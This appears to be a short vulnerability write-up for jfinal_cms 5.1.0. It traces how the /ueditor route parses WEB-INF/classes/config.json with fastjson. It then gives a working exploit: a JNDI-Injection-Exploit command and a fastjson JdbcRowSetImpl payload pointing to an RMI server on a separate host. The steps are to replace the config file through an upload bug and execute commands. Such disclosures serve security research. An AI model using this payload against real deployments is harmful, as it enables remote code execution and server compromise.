jfinal_cms version:5.1.0
JDK version : jdk-8u351
The ActionEnter class is instantiated in the index method of the /ueditor route
The ConfigManager class is instantiated in the constructor of the ActionEnter class
The construction method of ConfigManager calls initEnv()
Call JSONObject.parseObject to parse the file content, and the file content here is controllable, just replace the file content with the payload.
The file comes from WEB-INF/classes/config.json. With any file upload vulnerability in the background, this file can be replaced with a file containing the payload to trigger fastjson deserialization
Run the tool on kali
```
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc.exe"
```
payload:
```
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://192.168.0.110:1099/d0inxc",
"autoCommit":true
}
}
```
Replace with payload
Visit /ueditor, execute the command to pop up the calculator
京公网安备 11010502034610号
暂无评论